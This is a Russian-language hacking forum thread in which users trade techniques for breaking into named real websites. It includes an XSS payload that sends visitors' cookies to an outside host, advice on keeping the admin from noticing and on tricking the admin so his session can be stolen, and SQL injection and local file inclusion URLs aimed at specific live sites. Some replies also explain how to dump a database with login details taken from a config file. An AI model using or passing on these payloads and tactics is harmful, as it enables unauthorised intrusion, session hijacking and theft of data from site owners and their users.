Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при: <limit GET> .. Можно обойти авторизацию, отправив POST запрос.
M_script ты имеешь виду чтобы такого небыло : Это появляется когда я в строке name пишу <script> img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie; </script> , а вот source : <br /> <div id="guestbook_comments">Name: test <br />Message: This is a test comment. <br /></div><div id="guestbook_comments">Name: <script> img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie; </script <br />Message: fsdfsdf <br /></div> <br /> Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже. trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать <sc<script>ript>alert()</sc</script>ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> : , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ? И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )
В HTML: начало комментария. Если его поставишь, остальная часть сайта не откроется. И ты можешь написать админу, что сайт не грузится, он видит, что реально не грузится(а ты уже имеешь cookie)
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.
Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.
права в папке есть, на правку, залив но почему-то ничего не льется и не редактируется сервер виндосовский 2ereee, это уже другой
Инклуд с фильтром: PHP: import_request_variables('GPC'); if (strstr($file,'..') || strstr($file,'//') || strstr($file,'http') || strstr($file,'interface') ) exit; Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
http://www.sitc.ru/index.php?id=90000512 тиц 350 blind sql. реально такое раскрутить? без information_schema то
Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция: Code: http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13--+ ----------------------- AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету) есть инъекция, только толку от нее нет особого Code: http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+ есть рабочий инклуд Code: http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00 залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть Ну и доступ в админку, авторизация на самом сайте ... Дальше копать лень, ибо все равно там ничего интересного нет, удачи
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
Ребята, какая то мне не понятная ситуация )) в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку.. но там также есть конфиграционный файл, с логином и паролем типа такого: Code: mysql username = "logn" mysql password = "password" ### '1 list' table name = "rep1" 'reports' table name prefix = "rep2" '2' table name = "h" mysql db name = "NAME" mysql host = "127.0.0.1" mysql port = "3306" mysql unix socket = "/var/run/mysqld/mysqld.sock" ### config end помогите снять информацию ! Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод.
ты уже сделал дамп? что ты в браузере открываешь? если сделал, то скачай его на винт и открывай не в браузере. если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки: phpmyadmin pma myadmin, etc... гугли если есть доступ к файлам, то поставь дампер какой-нить, например: http://sypex.net/ru/products/dumper/downloads/ если есть доступ к консоли, то через mysqldump сделай: http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html
Там что-то типа PHP: $lang = ""; if($_GET['language'] == 'russian') $lang = 1; mysql_query("SELECT .. WHERE lang={$lang} AND ...."); Думаю что как-то так и выглядит код. Инъекции нет. Этот код просто написан по реакции скрипта на параметры, не более. Где ты там Blind нашел? http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20select%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201 Да, версия 4, обычный брут таблиц/колонок катит.
Эээ..идиотский фильтр Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?